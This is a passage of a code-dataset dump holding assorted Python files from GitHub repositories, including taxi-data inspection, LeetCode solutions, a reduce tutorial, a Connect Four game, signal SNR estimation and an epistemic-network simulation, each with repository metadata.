writer.writerow([havq1calc, havq3calc])\n\n writer.writerow([\"Odometer Distance Range\"])\n writer.writerow([minodo, maxodo])\n\n writer.writerow([\"Haversine Distance Range\"])\n writer.writerow([minhav, maxhav])\n\n writer.writerow([\"Travel Time Range\"])\n writer.writerow([mintt, maxtt])\n\n writer.writerow([\"Passengers Per Hour\"])\n pph_keys = avg_pph.keys()\n #print(pph_keys)\n writer.writerow(pph_keys)\n pph_values = [avg_pph[x] for x in pph_keys]\n writer.writerow(pph_values)\n\n writer.writerow([\"Vendor IDs\"])\n vid_keys = list(vid_values.keys())\n vid_keys.sort()\n writer.writerow(vid_keys)\n writer.writerow([vid_values[x] for x in vid_keys])\n writer.writerow([\"Rate Codes\"])\n rc_keys = list(rc_values.keys())\n 
rc_keys.sort()\n writer.writerow(rc_keys)\n writer.writerow([rc_values[x] for x in rc_keys])\n writer.writerow([\"Store and Forward Flags\"])\n saff_keys = list(saff_values.keys())\n saff_keys.sort()\n writer.writerow(saff_keys)\n writer.writerow([saff_values[x] for x in saff_keys])\n writer.writerow([\"Passenger Counts\"])\n pc_keys = list(pc_values.keys())\n pc_keys.sort()\n writer.writerow(pc_keys)\n writer.writerow([pc_values[x] for x in pc_keys])\n\nprint(\"Inspection complete, look at \"+ofn+\" for results\")\n","repo_name":"moellerben/IA626BigDataInspection-Moeller","sub_path":"inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":12549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11443834345","text":"from collections import Counter\nclass Solution:\n def maxOperations(self, nums: List[int], k: int) -> int:\n nums = Counter([i for i in nums if i < k])\n ans = 0\n for i in nums:\n if k-i in nums and nums[i]>0 and nums[k-i]>0:\n count = nums[i]//2 if i==k-i else min(nums[i],nums[k-i])\n nums[i]-=count\n nums[k-i]-=count\n ans+=count\n return ans\n \n \n# from collections import defaultdict\n# class Solution:\n# def maxOperations(self, nums: List[int], k: int) -> int:\n# pair = defaultdict(int) # integer 0 is the default value of all the keys\n# res = 0\n \n# for n in nums:\n# if pair[n]: # if we encountered k - n already\n# res += 1\n# pair[n] -= 1\n# else: # if we did'n find a pair yet\n# pair[k - n] += 1\n \n# return res\n","repo_name":"kwilliam777/CodingTestStudy","sub_path":"weekly assingment/week17/k_1679_m.py","file_name":"k_1679_m.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31778396990","text":"\"\"\"\nReducing functions in python are functions that recombine an iterable recursively,\nending up with a single retunr value.\n\"\"\"\n\n# Ex. 
01 - Finding the maximum value in an iterable\nl = [5, 8, 6, 10, 9]\n\nmax_value = lambda a, b : a if a > b else b\n\ndef max_sequence(sequence):\n    result = sequence[0]\n    for e in sequence[1:]:\n        result = max_value(result, e) # result = max(5,8)\n    return result\n\n# Finding the minimum is similar, so we can extract a common pattern.\n# fn = max_value\n\ndef _reduce(fn, sequence):\n    result = sequence[0]\n    for x in sequence[1:]:\n        result = fn(result, x)\n    return result\n\nprint(_reduce(lambda a, b: a if a > b else b, l )) # maximum\n\nprint(_reduce(lambda a, b: a if a < b else b, l )) # minimum\n\n# Adding all the elements in a list\n\nadd = lambda a, b: a + b\n\nl = [5, 8, 6, 10, 9]\n\ndef _reduce(fn, sequence):\n    result = sequence[0]\n    for x in sequence[1:]:\n        result = fn(result, x)\n    return result\n\nprint(_reduce(add, l))\n\n# The functools module\n\nfrom functools import reduce\n\nl = [5, 8, 6, 10, 9]\n\n# Using reduce with any iterable\nprint(reduce(lambda a, b: a if a > b else b, l))\nprint(reduce(lambda a, b: a if a < b else b, l))\nprint(reduce(lambda a, b: a if a < b else b, {10, 5, 2, 4}))\nprint(reduce(lambda a, b: a if a < b else b, 'python'))\n\nprint(min([5, 8, 6]))\nprint(max([5, 8, 6]))\nprint(sum([5, 8, 6]))\n\n# any(l) --- returns True if any element in l is truthy - False otherwise\n# all(l) --- returns True if all elements in l are truthy\n\n# Using reduce to reproduce any\n\nl = [0, '', None, 100] # 100 is truthy\n\nresult = bool(0) or bool('') or bool(None) or bool(100)\nprint(result)\n\nresult = bool(0) # f\nresult = result or bool('') #f\nresult = result or bool(None) # f\nresult = result or bool(100) # t\n\n# == Any\nprint(reduce(lambda a, b : bool(a) or bool(b), l))\n\n# Calculating the product of all elements in an iterable\n# ------------------------------------------------------\n\nl = [1, 3, 5, 6]\n\nprint(reduce(lambda a, b : a * b, l))\n\n# Calculating n!\n# --------------\n# 5! = 1 * 2 * 3 * 4 * 5\n\nrange(1, 6) # multiplying the numbers in this range gives the factorial of 5\n\nprint(reduce(lambda a, b: a * b, range(1, 5+1) ))\n\n# The reduce initializer\n\"\"\"\nThe reduce function has a third (optional) parameter: initializer (defaults to None).\n!! For summing a list use an initializer of 0, since it will not affect the result.\n!! For a product use an initializer of 1. 
\n\n\"\"\"\n\nl = []\n# print(reduce(lambda x, y: x + y, l)) -- > exception\n\nl = []\nprint(reduce(lambda x, y: x + y, l, 1)) # initializer = 1\n\nl = [1, 2, 3]\nprint(reduce(lambda x, y: x + y, l, 100)) # 106\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"rafael1717y/repo-python","sub_path":"deep_dive_python/32.secao_6_reducing_functions1.py","file_name":"32.secao_6_reducing_functions1.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4872011017","text":"import pandas as pd \nimport numpy.random as rand \nfrom rbf import *\nfrom sklearn.metrics import mean_squared_error\nfrom timeit import default_timer as timer \n\ndata = pd.read_csv(\"sin.csv\", \";\") \nX = data[data.columns[:-1]] \ny = data[data.columns[-1]]\n\nX = X.as_matrix()\ny = y.as_matrix()\n\nstart = timer() \n\nfor i in range(10):\n model = RBFNet(10, p=0.1, compute_widths='none')\n model.fit(X,y) \n yy = model.predict(X)\n\n err = 100*mean_squared_error(y, yy)\n print(\"Err:\", err)\n\nend = timer() \nprint(\"Time:\", end - start) \n\nfrom sklearn.externals import joblib \n\njoblib.dump(model, \"rbf.pkl\")\nmodel2 = joblib.load(\"rbf.pkl\") \n\nyy = model2.predict(X)\nerr = 100*mean_squared_error(y, yy)\nprint(\"Err after load:\", err) \n","repo_name":"PetraVidnerova/pyRBF","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43365445644","text":"age = int(input())\nneed_sum = float(input())\ntoy_price = int(input())\nsum = 0\nreciver_money = 0\nfor i in range(1,age+1):\n if i % 2 == 0:\n reciver_money += 10\n sum = sum + (reciver_money - 1)\n\n else:\n sum = sum + toy_price\nif need_sum > sum:\n print(f'No! {need_sum - sum:.2f}')\nelse:\n print(f'Yes! {sum - need_sum:.2f}')","repo_name":"StoyanNakov/SoftUni","sub_path":"Programming Basics with Python - june 2022/For Loop - Exercise/04. 
Clever Lily/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32248982991","text":"from board import Board\nfrom player import Player\n\nclass Game:\n    def __init__(self):\n        self.players = []\n        self.board = Board(6, 7)\n        self.turn = 0\n\n    def play_game(self):\n        print(\"Welcome to Connect 4!\")\n        print(\"Get four of your pieces in a row to win!\")\n\n        self.players.append(Player('x'))\n        self.players.append(Player('y'))\n        self.board.disp_board()\n        while True:\n            try:\n                choice = self.players[self.turn].get_choice(self.players[self.turn].name)\n                self.board.add_piece(choice, self.players[self.turn])\n                self.board.disp_board()\n                if self.board.check_winner():\n                    print(f\"{self.players[self.turn].name} has won the game!\")\n                    break\n                if self.board.is_full():\n                    raise ValueError(\"Board is full!\")\n                self.turn = (self.turn + 1) % 2\n            except ValueError as err:\n                print(err)\n                break\n\n\ndef main():\n    game = Game()\n    game.play_game()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"EthanH44/connectfour","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40787247336","text":"import math\r\nfrom collections import Counter\r\n\r\n\r\ndef isPrime(n):\r\n\tfor i in range(2, int(math.sqrt(n)) + 1):\r\n\t\tif n % i == 0:\r\n\t\t\treturn False\r\n\treturn True\r\n\r\n\r\ndef get_next_prime(prime):\r\n\tprime += 1\r\n\twhile not isPrime(prime):\r\n\t\tprime += 1\r\n\treturn prime\r\n\r\n\r\ndef count_div(n):\r\n\ta = []\r\n\twhile n != 1:\r\n\t\ti = 2\r\n\t\tif n % i == 0:\r\n\t\t\ta.append(i)\r\n\t\t\tn = n // i\r\n\t\telse:\r\n\t\t\twhile n % i:\r\n\t\t\t\ti = get_next_prime(i)\r\n\t\t\ta.append(i)\r\n\t\t\tn = n // i\r\n\tb = [0]\r\n\ta = Counter(a)\r\n\tlist_keys = list(a.keys())\r\n\tj = 2\r\n\tcount = 0\r\n\tfor i in list_keys:\r\n\t\twhile j != i:\r\n\t\t\tj = get_next_prime(j)\r\n\t\t\tb.append(0)\r\n\t\t\tcount += 1\r\n\t\tb[count] = a[i]\r\n\tamount = 1\r\n\tfor i in range(len(b)):\r\n\t\tamount *= b[i] + 1\r\n\treturn amount\r\n\r\n\r\ni, number = 1, 1\r\nwhile count_div(number) < 500:\r\n\ti += 1\r\n\tnumber += i\r\nprint(number)\r\n","repo_name":"nikervm/Project-Euler","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9200621646","text":"import h5py\nimport argparse\n\nimport numpy as np\nfrom scipy.signal import welch, hann\n\nfrom lsl.reader.ldp import LWASVDataFile\n\ndef estimate_snr(data, fft_len, target_freq, fs, fc):\n    '''\n    Uses Welch's periodogram method to estimate signal and noise powers.\n    '''\n\n    # use a periodic hann window\n    win = hann(fft_len, sym=False)\n\n    # overlap is nperseg // 2 by default\n    freqs, pxx = welch(x=data, fs=fs, nperseg=fft_len, return_onesided=False, window=win, detrend=False)\n\n    # shift frequencies up from baseband\n    freqs += fc\n\n    target_bin = np.argmin([abs(target_freq - f) for f in freqs])\n\n    print(f\"using bin {target_bin}\")\n\n    # the window shape will show how the signal leaks into neighboring bins\n    # compute the bin shape in the frequency domain\n    fwin = np.abs(np.fft.fft(win))\n    # center it where we think the signal is\n    
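# (worked example, assuming fft_len=8 and target_bin=3: np.roll shifts the\n    # window's frequency response so its main lobe sits over bin 3; the bins\n    # where |fwin| > 1 below are then treated as carrying signal energy, and\n    # the remaining bins are used to estimate the noise floor)\n    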
fwin = np.roll(fwin, target_bin)\n    # the signal leaks where the window magnitude is large\n    sig_idx = np.abs(fwin) > 1\n    nosig_idx = np.invert(sig_idx)\n\n    noise_density_est = pxx[nosig_idx].mean()\n    noise_power_est = noise_density_est * fs\n\n    sig_bins = pxx[sig_idx]\n    sig_power_est = (np.sum(sig_bins) - len(sig_bins) * noise_density_est) * fs / fft_len\n\n    snr_est = sig_power_est / noise_power_est\n\n    return snr_est\n","repo_name":"mistic-lab/lwa-tools","sub_path":"lwatools/utils/bin_power.py","file_name":"bin_power.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13887169324","text":"from NewCoordinates import NewCoordinates\nimport pygame\n\n\nclass BallDirection:\n    def __init__(self, screen, ball):\n        self.screen = screen\n        # The final predicted point\n        self.final_y = 0\n        # The ball's next coordinates\n        self.next_coordinates = NewCoordinates(0, 0, 0, 0)\n        # The ball's final coordinates\n        self.final_coordinates = NewCoordinates(0, 0, 0, 0)\n        self.ball = ball\n\n    # Predict the ball's next coordinates\n    def predict_next_coordinate(self):\n        ball = self.ball\n\n        # Compute the new coordinates\n        self.next_coordinates = NewCoordinates(\n            ball.x_middle(), ball.y_middle(), ball.get_dx(), ball.get_dy())\n        next_coordinates = self.next_coordinates\n\n        # If the ball hit a wall, the vector has to be recomputed\n        if next_coordinates.hit_top_or_bottom():\n            self.final_coordinates = NewCoordinates(next_coordinates.get_new_x(\n            ), next_coordinates.get_new_y(), ball.get_dx(), -ball.get_dy())\n            self.final_y = self.final_coordinates.get_new_y()\n        else:\n            self.final_y = next_coordinates.get_new_y()\n\n    # Draw the predicted vector\n    def draw(self):\n        ball = self.ball\n        next_coordinates = self.next_coordinates\n        final_coordinates = self.final_coordinates\n        x_middle = ball.x_middle()\n        y_middle = ball.y_middle()\n        if next_coordinates.hit_top_or_bottom():\n            pygame.draw.line(self.screen, (255, 0, 0), (ball.x_middle(),\n                                                        ball.y_middle()), (next_coordinates.get_new_x(), next_coordinates.get_new_y()), 1)\n\n            pygame.draw.line(self.screen, (255, 0, 0), (next_coordinates.get_new_x(\n            ), next_coordinates.get_new_y()), (final_coordinates.get_new_x(), final_coordinates.get_new_y()), 1)\n        else:\n            pygame.draw.line(self.screen, (255, 0, 0), (ball.x_middle(),\n                                                        ball.y_middle()), (next_coordinates.get_new_x(), next_coordinates.get_new_y()), 1)\n\n    def get_ball_prediction_y(self):\n        return self.final_y\n","repo_name":"otmanerahim/pong-mission-stage","sub_path":"TP5/TP5/BallDirection.py","file_name":"BallDirection.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41055755064","text":"import networkx as nx\nimport numpy as np\n\nfrom abc import ABC, abstractmethod\nfrom networkx.algorithms.components import connected_components\nfrom numpy import random\nfrom typing import Dict, List, Set, Tuple\n\nfrom src.epinet.agent import Agent\nfrom src.utils.logger import get_logger\n\n\nlogger = get_logger(__name__)\n\n\nclass EpistemicNetwork(ABC):\n    # TODO: documentation\n    STATE_CORRECT_CONSENSUS = 'Correct Consensus'\n    STATE_INCORRECT_CONSENSUS = 'Incorrect Consensus'\n    STATE_CORRECT_DISAGREEMENT = 'Correct Disagreement'\n    STATE_INCORRECT_DISAGREEMENT = 'Incorrect Disagreement'\n\n    def __init__(\n            self,\n            structure: Dict[str, Set[str]],\n            
alpha_action_payoff: float,\n beta_action_payoff: float,\n consensus_threshold: float,\n trials_nr: int\n ):\n g = nx.Graph(structure)\n g.remove_edges_from(nx.selfloop_edges(g))\n undirected_structure = nx.convert.to_dict_of_lists(g)\n self.adjacency_list = undirected_structure\n self.id_to_agents = {int(i): Agent(int(i), random.uniform(0, 1), undirected_structure[i]) for i in\n undirected_structure.keys()}\n self.alpha_action_payoff = alpha_action_payoff\n self.beta_action_payoff = beta_action_payoff\n self.epsilon = self.beta_action_payoff - self.alpha_action_payoff\n self.consensus_threshold = consensus_threshold\n self.nr_trials = trials_nr\n\n def run_evidence_collection(self):\n for agent in self.id_to_agents.values():\n agent.get_evidence(self.nr_trials, self.alpha_action_payoff, self.beta_action_payoff)\n\n def run_credence_update(self):\n for agent in self.id_to_agents.values():\n sum_trials_nr = agent.trials_nr + sum(\n [self.id_to_agents[neighbor].trials_nr for neighbor in agent.neighbors if neighbor in self.id_to_agents.keys()])\n sum_successes_nr = agent.successes_nr + sum(\n [self.id_to_agents[neighbor].successes_nr for neighbor in agent.neighbors if neighbor in self.id_to_agents.keys()])\n if sum_trials_nr > 0:\n agent.update_credence(sum_trials_nr, sum_successes_nr, self.epsilon)\n\n def get_agents(self, subset_ids: Set[str]) -> List[Agent]:\n if subset_ids:\n agents = [agent for agent_id, agent in self.id_to_agents.items() if agent_id in subset_ids]\n else:\n agents = self.id_to_agents.values()\n return agents\n\n def is_incorrect_disagreement(self, subset_ids: Set[str] = None) -> bool:\n is_correct_disagreement = False\n alpha_action_voters_nr, beta_action_voters_nr = self.get_actions_voters_nr(subset_ids)\n if not self.is_alpha_consensus() and alpha_action_voters_nr >= beta_action_voters_nr:\n is_correct_disagreement = True\n return is_correct_disagreement\n\n def is_correct_disagreement(self, subset_ids: Set[str] = None) -> bool:\n is_incorrect_disagreement = False\n alpha_action_voters_nr, beta_action_voters_nr = self.get_actions_voters_nr(subset_ids)\n if not self.is_beta_consensus() and beta_action_voters_nr > alpha_action_voters_nr:\n is_incorrect_disagreement = True\n return is_incorrect_disagreement\n\n def is_alpha_consensus(self, subset_ids: Set[str] = None) -> bool:\n agents = self.get_agents(subset_ids)\n is_alpha_consensus = all( agent.credence < self.alpha_action_payoff for agent in agents)\n return is_alpha_consensus\n\n def is_beta_consensus(self, subset_ids: Set[str] = None) -> bool:\n agents = self.get_agents(subset_ids)\n is_beta_consensus = all(agent.credence > self.consensus_threshold for agent in agents)\n return is_beta_consensus\n\n def is_consensus(self, subset_ids: Set[str] = None) -> bool:\n \"\"\"\n Checks if there is a consensus regarding superiority of one of the actions.\n \"\"\"\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n return self.is_alpha_consensus(subset_ids) or self.is_beta_consensus(subset_ids)\n\n def get_connected_agents_ids(self) -> Set[str]:\n connected_agents_ids = {i for i, a in self.id_to_agents.items() if a.neighbors}\n return connected_agents_ids\n\n def get_state(self, subset_ids: Set[str] = None) -> str:\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n state = ''\n if self.is_alpha_consensus(subset_ids):\n state = self.STATE_INCORRECT_CONSENSUS\n elif self.is_beta_consensus(subset_ids):\n state = self.STATE_CORRECT_CONSENSUS\n elif 
self.is_incorrect_disagreement(subset_ids):\n state = self.STATE_INCORRECT_DISAGREEMENT\n elif self.is_correct_disagreement(subset_ids):\n state = self.STATE_CORRECT_DISAGREEMENT\n return state\n\n def get_mean_credence(self, subset_ids: Set[str] = None) -> float:\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n agents = self.get_agents(subset_ids)\n return np.mean([agent.credence for agent in agents])\n\n def get_actions_voters_nr(self, subset_ids: Set[str] = None) -> Tuple[int, int]:\n if not subset_ids:\n subset_ids = self.get_connected_agents_ids()\n agents = self.get_agents(subset_ids)\n alpha_action_voters_nr = len(list(a for a in agents if a.credence <= self.alpha_action_payoff))\n beta_action_voters_nr = len(list(a for a in agents if a.credence > self.alpha_action_payoff))\n return alpha_action_voters_nr, beta_action_voters_nr\n\n def to_networkx_graph(self):\n return nx.Graph(self.adjacency_list)\n\n def get_connected_components(self) -> List[Set[str]]:\n g = self.to_networkx_graph()\n cc = [cc for cc in connected_components(g)]\n return cc\n\n def get_states_of_connected_components(self) -> List[Tuple[int, str]]:\n cc = self.get_connected_components()\n states = []\n for i, c in enumerate(cc):\n state = self.get_state(c)\n states.append((len(c), state))\n return states\n\n def print_agents(self):\n for agent in self.id_to_agents.values():\n print(f\" -> Agent {agent.id}, cred: {agent.credence:.2f}, trials_nr: {agent.trials_nr}, succ_nr: {agent.successes_nr}, neighbours: {agent.neighbors}\")\n\n def describe(self):\n print('Agents details')\n self.print_agents()\n print(f'Consensus check: {self.is_consensus()}')\n print(f'State: {self.get_state()}')\n print(f'Mean credence: {self.get_mean_credence()}')\n print(f'Action voters: {self.get_actions_voters_nr()}')\n print()\n\n def get_status(self):\n result = []\n state = self.get_state()\n alpha_voters, beta_voters = self.get_actions_voters_nr()\n mean_credence = self.get_mean_credence()\n connected_comps = self.get_connected_components()\n connected_comps_nr = len(connected_comps)\n for connected_component_id, subset in enumerate(connected_comps):\n cc_size = len(subset)\n cc_state = self.get_state(subset)\n cc_alpha_voters, cc_beta_voters = self.get_actions_voters_nr(subset)\n cc_mean_credence = self.get_mean_credence(subset)\n row = (state, alpha_voters, beta_voters, mean_credence, connected_comps_nr, connected_component_id, cc_size, cc_state, cc_alpha_voters, cc_beta_voters, cc_mean_credence)\n result.append(row)\n return result\n\n def get_current_status(self):\n connected_comps = self.get_connected_components()\n biggest_cc = max(connected_comps, key=len)\n alpha_voters, beta_voters = self.get_actions_voters_nr()\n biggest_cc_av, biggest_cc_bv = self.get_actions_voters_nr(biggest_cc)\n status = {\n 'full_net_state': self.get_state(),\n 'full_net_av': alpha_voters,\n 'full_net_bv': beta_voters,\n 'full_net_cred': self.get_mean_credence(),\n 'big_cc_state': self.get_state(biggest_cc),\n 'big_cc_av': biggest_cc_av,\n 'big_cc_bv': biggest_cc_bv,\n 'big_cc_cred': self.get_mean_credence(biggest_cc),\n #'rest_cc_status': 1,\n #'rest_cc_av': 1,\n #'rest_cc_bv': 1,\n #'rest_cc_cred': 1\n }\n return status\n\n\nclass StaticEpistemicNetwork(EpistemicNetwork):\n pass\n\n\nclass DynamicEpistemicNetwork(EpistemicNetwork):\n\n def update_structure(self, adjacency_list: Dict[str, Set[str]]):\n \"\"\"\n\n :param adjacency_list:\n :return:\n \"\"\"\n g = nx.Graph(adjacency_list)\n g.remove_edges_from(nx.selfloop_edges(g))\n 
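# (illustration of the set algebra used further down, assuming current\n        # agent ids {1, 2, 3} and new structure ids {2, 3, 4}:\n        #   detach = {1, 2, 3} - {2, 3, 4} = {1}\n        #   update = {1, 2, 3} & {2, 3, 4} = {2, 3}\n        #   create = {2, 3, 4} - {1, 2, 3} = {4})\n        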
adjacency_list = nx.convert.to_dict_of_lists(g)\n self.adjacency_list = adjacency_list\n #print(self.adjacency_list)\n\n current_agents_ids = set(self.id_to_agents.keys())\n new_structure_agent_ids = set(self.adjacency_list.keys())\n\n ids_agents_to_detach = current_agents_ids.difference(new_structure_agent_ids)\n ids_agents_to_update = current_agents_ids.intersection(new_structure_agent_ids)\n ids_agents_to_create = new_structure_agent_ids.difference(current_agents_ids)\n\n #logger.info(f'Agents to detach: {ids_agents_to_detach}')\n #logger.info(f'Agents to update: {ids_agents_to_update}')\n #logger.info(f'Agents to create: {ids_agents_to_create}')\n\n # 1. agents not present in new structure\n for agent_id in ids_agents_to_detach:\n self.id_to_agents[agent_id].set_neighbors(set())\n self.adjacency_list[agent_id] = set()\n\n # 2. Update agents present in new structure\n for agent_id in ids_agents_to_update:\n self.id_to_agents[agent_id].set_neighbors(self.adjacency_list[agent_id])\n\n # 3. Create new agents for ids present only in new structure\n for agent_id in ids_agents_to_create:\n self.id_to_agents[agent_id] = Agent(agent_id, random.uniform(0, 1), self.adjacency_list[agent_id])\n\n def get_state_of_connected_components(self):\n pass\n","repo_name":"KE4T5/network-epistemology","sub_path":"src/epinet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11160335075","text":"from django import forms\nfrom django.utils.translation import gettext_lazy as _\n\nfrom . import models\n\n\nclass TeeOffTimeAdminForm(forms.ModelForm):\n sales = forms.FloatField(\n label=_('Sales'),\n required=False,\n )\n\n profit = forms.FloatField(\n label=_('Profit'),\n required=False,\n )\n\n def __init__(self, *args, **kwargs):\n super(TeeOffTimeAdminForm, self).__init__(*args, **kwargs)\n\n class Meta:\n model = models.TeeOffTime\n fields = '__all__'\n","repo_name":"pincoin/naonegolf","sub_path":"windmill/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285141628","text":"#\n# @lc app=leetcode id=34 lang=python3\n#\n# [34] Find First and Last Position of Element in Sorted Array\n#\n# https://leetcode.com/problems/find-first-and-last-position-of-element-in-sorted-array/description/\n#\n# algorithms\n# Medium (35.04%)\n# Likes: 2593\n# Dislikes: 116\n# Total Accepted: 421.1K\n# Total Submissions: 1.2M\n# Testcase Example: '[5,7,7,8,8,10]\\n8'\n#\n# Given an array of integers nums sorted in ascending order, find the starting\n# and ending position of a given target value.\n# \n# Your algorithm's runtime complexity must be in the order of O(log n).\n# \n# If the target is not found in the array, return [-1, -1].\n# \n# Example 1:\n# \n# \n# Input: nums = [5,7,7,8,8,10], target = 8\n# Output: [3,4]\n# \n# Example 2:\n# \n# \n# Input: nums = [5,7,7,8,8,10], target = 6\n# Output: [-1,-1]\n# \n#\n\n# @lc code=start\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n\n def extreme_insertion_index(nums, target, left):\n lo, hi = 0, len(nums)\n\n while lo < hi:\n mid = (lo + hi) // 2\n if nums[mid] > target or (left and target == nums[mid]):\n hi = mid\n else:\n lo = mid + 1\n\n return lo\n\n left_idx = extreme_insertion_index(nums, target, True)\n\n if left_idx == len(nums) or nums[left_idx] != target:\n return [-1, 
-1]\n\n return [left_idx, extreme_insertion_index(nums, target, False) - 1]\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"34.find-first-and-last-position-of-element-in-sorted-array.py","file_name":"34.find-first-and-last-position-of-element-in-sorted-array.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28832107148","text":"#!/usr/bin/env python\n\nimport subprocess\n\ndef main():\n ps_text = subprocess.check_output(\n 'ps -e -o pcpu,rss,comm --no-headers --sort=-pcpu | head',\n shell=True)\n ps_text = ps_text.decode()\n print(ps_text)\n ps_lines = ps_text.split('\\n')\n print(ps_lines)\n for line in ps_lines:\n if not line:\n continue\n pcpu, rss, command = line.split(None, 2)\n usage = int(float(pcpu) * int(rss) / 100.)\n print(usage, command)\n\nif __name__=='__main__':\n main()\n","repo_name":"johntellsall/johntellsall.com","sub_path":"quality-prog-ops/checkusage2.py","file_name":"checkusage2.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11463476725","text":"import re\nfrom xpinyin import Pinyin\n\n\ndef alter(file, old_str='', new_str=''):\n \"\"\"\n 替换文件中的字符串\n :param file:文件名\n :param old_str:就字符串\n :param new_str:新字符串\n :return:\n \"\"\"\n p = Pinyin()\n file_data = \"\"\n title_pattern = 'title: ?\"(.*)?\"'\n slug_pattern = 'slug:(.*)?'\n with open(file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n match_slug = re.match(slug_pattern, line, re.M | re.I)\n print(match_slug)\n if match_slug:\n slug = match_slug.group(1)\n if slug:\n line = ''\n\n match_title = re.match(title_pattern, line, re.M | re.I)\n if match_title:\n title = match_title.group(1)\n if title:\n title_pinyin = p.get_pinyin(title, ' ')\n print(title_pinyin)\n title_pinyin = re.sub(\"[^a-zA-Z-0-9.]+\", \" \", title_pinyin)\n title_pinyin = re.sub(\" +\", \" \", title_pinyin)\n print(title_pinyin)\n new_str = 'slug: \"' + title_pinyin + '\"\\n'\n line = new_str + line\n\n file_data += line\n with open(file, \"w\", encoding=\"utf-8\") as f:\n f.write(file_data)\n\n# alter(\"C:\\www\\code\\whzywxt.github.io\\content\\post\\PHP常用算法.md\", \"PHP常用算法\", \"python\")\n","repo_name":"whzywxt/books","sub_path":"python/file_replace.py","file_name":"file_replace.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73393353124","text":"import argparse, json\n\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.patches as mpatches\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport seaborn as sns\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom utils import combine_columns, scale\n\n\nTRACTS = '../../Data/tract_geo_data.json'\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', type=str, required=True)\n parser.add_argument('-o', '--output', type=str, required=True)\n parser.add_argument('-b', '--biastype', type=str, required=True)\n args = parser.parse_args()\n inpath, outpath, biastype = args.input, args.output, args.biastype\n\n tracts = json.load(open(TRACTS, 'r'))\n pdict = { tract: tracts[tract]['properties']['population'] for tract in tracts }\n adict = { tract: tracts[tract]['properties']['aland'] for tract in tracts }\n\n header = np.loadtxt(inpath, delimiter=',', max_rows=1, dtype=np.str)\n data = 
np.loadtxt(inpath, delimiter=',', skiprows=1)\n \n # Remove rows with any NaN values\n nanrows = np.asarray([idx for idx in range(data.shape[0]) if np.isnan(data[idx, :]).any()])\n if nanrows.shape[0] > 0: data = np.delete(data, nanrows, axis=0)\n\n # Remove rows where requested bias type is 0\n zrows = np.argwhere(data[:, np.argwhere(header==biastype)[0, 0]] == 0).flatten()\n data = np.delete(data, zrows, axis=0)\n\n colpairs = [\n [\"Non-White\", \"White alone\"],\n [\"Generation X + Boomer + Silent\", \"Millenials + Gen Z\"],\n [\"High school diploma or less\", \"College Degree\"],\n [\"Below Poverty Line\", \"Above Poverty Line\"],\n [\"Not a U.S. citizen\", \"U.S. citizen\"],\n [\"Below Median House Price\", \"Above Median House Price\"]\n ]\n\n # Calculate Population Density\n header = np.concatenate([header, ['Population Density']])\n pops = np.asarray([pdict[str(int(data[idx, np.argwhere(header=='Census Tract')[0, 0]]))] for idx in range(data.shape[0])]).reshape((-1, 1)).astype(np.float64)\n areas = np.asarray([adict[str(int(data[idx, np.argwhere(header=='Census Tract')[0, 0]]))] for idx in range(data.shape[0])]).reshape((-1, 1)).astype(np.float64)\n pops /= areas\n data = np.concatenate([data, pops], axis=1)\n\n # Scale pickup and dropoff count by area in census tract\n ctidx = np.argwhere(header==\"Census Tract\")[0, 0]\n pidx = np.argwhere(header==\"Pickup Count\")[0, 0]\n didx = np.argwhere(header==\"Dropoff Count\")[0, 0]\n for aridx in range(data.shape[0]):\n tract = str(int(data[aridx, ctidx]))\n area = adict[tract]\n data[aridx, pidx] /= area\n data[aridx, didx] /= area\n\n # Calculate demographic ratios from raw counts\n for pair in colpairs:\n c1, c2 